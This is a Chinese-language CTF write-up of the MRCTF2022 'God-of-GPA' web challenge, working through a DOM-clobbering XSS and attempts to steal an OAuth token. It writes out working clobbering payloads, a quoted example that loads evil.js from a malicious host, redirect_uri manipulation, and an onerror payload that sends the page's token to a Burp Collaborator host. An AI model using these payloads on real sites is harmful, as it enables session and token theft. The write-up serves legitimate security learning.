MRCTF2022

http://brtserver.node2.buptmerak.cn/signin

周末没打比赛 听说有个xss 现在有空来看看

God-of-GPA

注册一个 jackma 123

感觉这里有个xss

1
2
3
4
5
6
<script>
let Img = window.MyImg || {src: 'https://md.buptmerak.cn/uploads/upload_d12a3804a813ffb14fe38a318d6bfcf1.png'}
let Container = document.createElement("div");
Container.innerHTML = '<img class="avatar" src="' + Img.src + '">';
document.body.appendChild(Container);
</script>

https://developer.mozilla.org/zh-CN/docs/Web/API/Node/appendChild

我们能不能动 window.MyImg ? 动的话是不是可以形成 dom xss

这个 window.MyImg 怎么动

想起了以前看过的dom clobbering

学一下 dom clobbering

https://portswigger.net/web-security/dom-based/dom-clobbering

可以看到这题和教学里的示范很相似

接着读了读 zeddyu 大佬的文章

https://blog.zeddyu.info/2020/03/04/Dom-Clobbering/

下面直接把 portswigger上的相关介绍拉了下来

How to exploit DOM-clobbering vulnerabilities

A common pattern used by JavaScript developers is:

1
var someObject = window.someObject || {};

If you can control some of the HTML on the page, you can clobber the someObject reference with a DOM node, such as an anchor. Consider the following code:

1
2
3
4
5
6
7
8
<script>
window.onload = function(){
let someObject = window.someObject || {};
let script = document.createElement('script');
script.src = someObject.url;
document.body.appendChild(script);
};
</script>

To exploit this vulnerable code, you could inject the following HTML to clobber the someObject reference with an anchor element:

1
<a id=someObject><a id=someObject name=url href=//malicious-website.com/evil.js>

As the two anchors use the same ID, the DOM groups them together in a DOM collection. The DOM clobbering vector then overwrites the someObject reference with this DOM collection. A name attribute is used on the last anchor element in order to clobber the url property of the someObject object, which points to an external script.

相信看到这里大家都知道这题大概该怎么去打了

我在本地构造了如下的payload

1
2
3
4
5
6
7
8
9
10
<body>
<a id=MyImg>
<a id=MyImg name=src href="666">
<script>
let Img = window.MyImg || {src: 'https://md.buptmerak.cn/uploads/upload_d12a3804a813ffb14fe38a318d6bfcf1.png'}
let Container = document.createElement("div");
Container.innerHTML = '<img class="avatar" src="' + Img.src + '">';
document.body.appendChild(Container);
</script>
</body>

结果得到

1
2
3
<div>
<img class="avatar" src="file:///E:/js/666">
</div>

成功的进行了更改

payload

1
<a id=MyImg><a id=MyImg name=src href="cid:&quot;onerror=alert(1)//">

接下来要考虑一下怎么拿flag

我们现在可以进行xss 我们发现网站是使用的oauth认证的

F12看了一下

cookie中存的貌似是token 想办法拿到?

1
s:LSr-HmP6ei-vlHd6bhypbfVcy-tcuf1u.E0UpQsNSFuW+jDPhGUxC845rhVCZKjeLYW2wtr7vq4Y

或者说直接让admin去点GPA再发到我的服务器上 然后xsleak出来可以吗?

接着我发现了 认证时会请求

1
GET /oauth/authorize?redirect_uri=http://brtclient.node2.buptmerak.cn/login HTTP/1.1
1
GET /login?token=TCHa62XCtDG7DmjKG4w2KSj1paWaZ1aX HTTP/1.1

然后会带token登录

我尝试一下能不能拿到自己的token

发现直接填我的vps会出现 redirect_uri unmatched emmmm…

怎么解决呢加个 /login ?

1
GET /oauth/authorize?redirect_uri=https://0abcw6idy8id19y0dsddg11ycpig65.burpcollaborator.net

好像还是不行?我想到了

1
GET /oauth/authorize?redirect_uri=http://brtclient.node2.buptmerak.cn/login&redirect_uri=http://0abcw6idy8id19y0dsddg11ycpig65.burpcollaborator.net/ HTTP/1.1

md 报错了。。。

想个办法绕一下

https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-an-open-redirect

那能不能导到他自己的网页上再写一个xss?

1
2
<a id=MyImg>
<a id=MyImg name=src href="cid:&quot;onerror=window.location='http://0abcw6idy8id19y0dsddg11ycpig65.burpcollaborator.net'+window.location.search.substring(1)//">

这个是跳转的页面(上面的payload

1
http://brtserver.node2.buptmerak.cn/oauth/authorize?redirect_uri=http://brtclient.node2.buptmerak.cn/view/85d7da5b-b8a2-4734-95cb-6e654f77ab61

再来个跳转到redirect的页面

1
2
<a id=MyImg>
<a id=MyImg name=src href="cid:&quot;onerror=window.location='http://brtserver.node2.buptmerak.cn/oauth/authorize?redirect_uri=http://brtclient.node2.buptmerak.cn/view/85d7da5b-b8a2-4734-95cb-6e654f77ab61'//">

得到

1
/view/17c8aa93-827d-4c47-b525-a1e1d824a003

不知道为什么会报错 choa!~

尝试了一下official wp 也g了 那就没事了 思路是一模一样 2333

官方wp还有几种更好玩的玩法

https://ibukifalling.github.io/2022/04/25/God-of-GPA-WP/

总结一下

学到了不少的东西 感觉很不错!美滋滋